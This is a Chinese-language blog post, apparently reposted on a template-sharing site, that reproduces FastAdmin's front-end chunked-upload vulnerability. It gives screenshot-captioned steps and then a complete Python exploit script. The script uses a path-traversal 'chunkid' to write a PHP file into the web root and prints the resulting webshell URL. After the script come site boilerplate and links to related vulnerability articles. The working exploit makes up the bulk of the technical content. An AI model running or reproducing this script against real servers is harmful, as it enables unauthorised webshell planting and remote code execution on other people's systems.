fastadmin前台分片漏洞

这篇具有很好参考价值的文章主要介绍了fastadmin前台分片漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

参考链接:

fastadmin安装

fastadmin安装

前台分片漏洞复现:

https://blog.csdn.net/weixin_43288600/article/details/121192252

https://blog.csdn.net/u013921288/article/details/117670844

https://xz.aliyun.com/t/9395

FastAdmin最新RCE漏洞复现

https://www.secpulse.com/archives/157307.html

搭建好环境后,查看服务器ip:

fastadmin前台分片漏洞

注册账号,在上传页面进行抓包:

数据包如下:

fastadmin前台分片漏洞

发送到repeater:

fastadmin前台分片漏洞

构造分片数据包并发送:

fastadmin前台分片漏洞

fastadmin前台分片漏洞

可以发现在chunk文件夹下发现php文件已经成功上传。

fastadmin前台分片漏洞

测试发现,设定网站的根目录为 /public 之后就无法访问  runtime/chunks 下的文件,因此将上传文件路径改为

fastadmin前台分片漏洞

再次发送数据包,在根目录下成功上传文件:

fastadmin前台分片漏洞

访问成功,可以显示php文件中的内容。

fastadmin前台分片漏洞

撰写利用代码并在kali中执行:

fastadmin前台分片漏洞

浏览器访问webshel路径

fastadmin前台分片漏洞

Webshell上传成功

exp:文章来源地址https://www.toymoban.com/news/detail-466028.html

import sys
import requests
from time import time
from json import loads

headers = {
	'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36',
}

def banner():
	RED = '\033[31m'
	print(f"""
		{RED}  _____         _      _       _           _       
 |  ___|_ _ ___| |_   / \   __| |_ __ ___ (_)_ __  
 | |_ / _` / __| __| / _ \ / _` | '_ ` _ \| | '_ \ 
 |  _| (_| \__ \ |_ / ___ \ (_| | | | | | | | | | |
 |_|  \__,_|___/\__/_/   \_\__,_|_| |_| |_|_|_| |_|
                         Author: Search?=Null                          
	""")

def upload_chunk(url):
	upload_url = url.rstrip('/') + '/index/ajax/upload'
	file = {
		'file': ('%d.php' % time(), open('hhh.php', 'rb'), 'application/octet-stream')
	}
	chunk_id = time()
	data_ = {
		'chunkid': '../../public/%d.php' % chunk_id,
		'chunkindex': 0,
		'chunkcount': 1
	}
	resp = requests.post(
		upload_url,
		headers = headers,
		files = file,
		data = data_
	)
	result = loads(resp.text)
	if result['code'] == 1 and result['msg'] == '' and result['data'] == None:
		merge_file(upload_url, chunk_id)
		print('\nWebshell: %s/%d.php' % (url.rstrip('/'), chunk_id))
	elif result['msg'] != '':
                print(f"Not Vulnerability, {result['msg']}.")
	else:
		print('Not Vulnerability.')

def merge_file(url, chunk_id):
	data_ = {
		'action': 'merge',
		'chunkid': '../../public/%d.php' % chunk_id,
		'chunkindex': 0,
		'chunkcount': 1,
		'filename': '%d.php-0.part' % chunk_id
	}
	resp = requests.post(
		url,
		headers = headers,
		data = data_
	)

def main():
	global headers
	banner()
	if len(sys.argv) == 2:
		try:
			headers['Cookie'] = input('Cookie > ')
			upload_chunk(sys.argv[1])
		except Exception as e:
			print(e)
	else:
		print('Usage: python3 FastAdmin.py url')

if __name__ == "__main__":
	main()

到了这里,关于fastadmin前台分片漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)

    微信公众号搜索:南风漏洞复现文库 南风网络安全公众号首发 eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant DesignVue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发#x

    2024年02月06日
    浏览(141)
  • 【Nginx34】Nginx学习:安全链接、范围分片以及请求分流模块

    又迎来新的模块了,今天的内容不多,但我们都进行了详细的测试,所以可能看起来会多一点哦。这三个模块之前也从来都没用过,但是通过学习之后发现,貌似还都挺有用。当然,还是要根据具体业务情况来看,如果你的业务中有用到,那么就可以尝试一下哦。 安全链接是

    2024年02月07日
    浏览(30)
  • Office E5 OneDrive API使用指南:注册+密钥获取+获取临时上传链接+分片

    异想之旅:本人原创博客完全手敲,绝对非搬运,全网不可能有重复;本人无团队,仅为技术爱好者进行分享,所有内容不牵扯广告。本人所有文章仅在CSDN、掘金和个人博客(一定是异想之旅域名)发布,除此之外全部是盗文! 本文主要讲解的是自己注册了一个 E5 开发者账

    2024年02月04日
    浏览(37)
  • Zotero在word中插入带超链接的参考文献/交叉引用/跳转参考文献

    Zotero以其丰富的插件而闻名,使用起来十分的带劲,最重要的是它是免费的、不卡顿,不像某专业软件。 然而Zotero在word插入参考文献时,无法为参考文献添加超链接,这是一个不得不提的遗憾。 不过,有大佬已经写出了基于Word VBA语言的代码,可以为Zotero在Word中的参考文献

    2024年02月02日
    浏览(52)
  • 漏洞等级标准参考建议

    SRC漏洞定级标准 分资产,核心资产,一般资产,边缘资产 严重漏洞: 1.不需要登录直接获取设备root权限的漏洞,包括但不限于上传Webshell,任意代码执行,远程命令执行等 2.不需要登录直接导致严重的信息泄露漏洞,包括但不限于重要数据库的SQL注入、系统权限控制不严格

    2024年02月08日
    浏览(28)
  • WEB漏洞-XSS跨站脚本漏洞解决方案参考

    WEB漏洞-XSS跨站脚本漏洞解决方案-CSDN博客 Java使用过滤器防止XSS脚本注入_防注入 参数过滤-CSDN博客

    2024年02月01日
    浏览(71)
  • 漏洞扫描神器:Netsparker 保姆级教程(附链接)

    Netsparker是一款专业的网络安全扫描工具,用于自动化地发现和修复网站和Web应用程序中的安全漏洞。它提供了全面的安全测试,包括SQL注入、跨站脚本攻击、远程文件包含、命令注入等常见的安全漏洞。 Netsparker具有以下特点: 自动化扫描:Netsparker能够自动扫描网站和Web应

    2024年04月11日
    浏览(38)
  • 干货 | 6款漏扫工具来了(附工具下载链接)_ip漏洞扫描工具

    渗透测试收集信息完成后,就要根据所收集的信息,扫描目标站点可能存在的漏洞了,包括我们之前提到过的如:SQL注入漏洞、跨站脚本漏洞、文件上传漏洞、文件包含漏洞及命令执行漏洞等,通过这些已知的漏洞,来寻找目标站点的突破口,在这之前我们可能就已经接触过

    2024年02月21日
    浏览(68)
  • 【Python小技巧】使用必杀技一键安装Ta-lib(其它第三方库装不上的也可以参考,链接下载不了可通过文中CSDN资源下载)

    最近升级了电脑系统,换了个nvme的ssd,系统装了win11。界面很清爽,心情不错。安装了最新版本的Anaconda,Python也更新到3.10版本,环境都配置好了,但新装系统后,很多都需要重新配置。由于频繁需要使用到股票行情的指标计算,Ta-lib是必不可少的。但没想到安装依旧报错。

    2024年02月07日
    浏览(118)
  • 安装FastAdmin时报1146 Table 'fastadmin.fa_admin' doesn't exist错误

    Fastadmin的安装 安装路径 /public/install.php 有部分小伙伴在安装FastAdmin时报以下错误 SQLSTATE[42S02]: Base table or view not found: 1146 Table \\\'fastadmin.fa_admin\\\' doesn\\\'t exist 这基本上是由于你的数据库不支持Innodb引擎造成的。 解决办法: 打开Mysql配置文件,找到 skip-innodb 项,将其改成 #skip-inno

    2024年02月03日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包